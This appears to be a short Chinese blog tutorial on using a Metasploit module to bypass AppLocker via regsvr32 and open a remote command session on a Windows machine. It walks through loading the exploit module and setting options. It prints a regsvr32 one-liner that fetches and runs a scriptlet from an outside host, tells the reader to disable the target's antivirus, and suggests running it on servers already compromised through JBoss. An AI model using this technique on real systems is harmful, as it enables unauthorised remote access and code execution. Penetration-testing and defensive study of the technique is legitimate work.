Metasploit对Rundll32的

参考利用文章链接:http://www.freebuf.com/articles/terminal/135391.html

    http://www.4hou.com/technology/5737.html

Rundll32的利用是通过对注册动手脚,建立一个会话链接W7以上都存在,但是现在杀毒软件都监控,实验的时候关闭目标机的

杀毒软件(如:360)

通过虚拟机打物理机,下图可以看见同一网段而且是互相可以通讯的

Metasploit对Rundll32的

启动Metasploit

Metasploit对Rundll32的

加载漏洞利用模块:use exploit/windows/misc/regsvr32_applocker_bypass_server 

Metasploit对Rundll32的


查看需要哪些参数:show options 

Metasploit对Rundll32的

配置参数运行

Metasploit对Rundll32的

得到一个 regsvr32 /s /n /u /i:http://192.168.117.155:8080/S2hYxUgEgmEK9.sct scrobj.dll

Metasploit对Rundll32的

结合jeboss抓的服务器如果是Windows的,在获得的shell 的CMD命令下执行

Metasploit对Rundll32的

在回到kail 发现反弹了一个session ,执行session就开启了一个CMD

Metasploit对Rundll32的


结合一些windows的命令执行参考链接: http://www.sohu.com/a/199732200_99907709 





相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode